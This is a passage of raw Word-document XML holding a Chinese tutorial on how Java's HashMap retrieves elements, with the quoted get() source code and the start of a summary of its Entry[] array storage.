      </w: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null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>读取元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>有了上面存储时的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>算法作为基础，理解起来这段代码就很容易了。从上面的源代码中可以看出：从</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>元素时，首先计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，找到数组中对应位置的某一元素，然后通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法在对应位置的链表中找到需要的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的部分源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:noProof/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="66" name="图片 6" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> V get(Object key) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (key == </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> getForNullKey();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hash = hash(key.hashCode());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (Entry&lt;K,V&gt; e = table[indexFor(hash, table.length)];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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e = e.next) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Object k;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k)))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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return</w:t>
      </w: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null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>归纳起来简单地说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>在底层将</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-value </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>当成一个整体进行处理，这个整体就是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entry </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>底层采用一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entry[] </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>数组来保存所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-value </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对，当需要存储一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entry </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
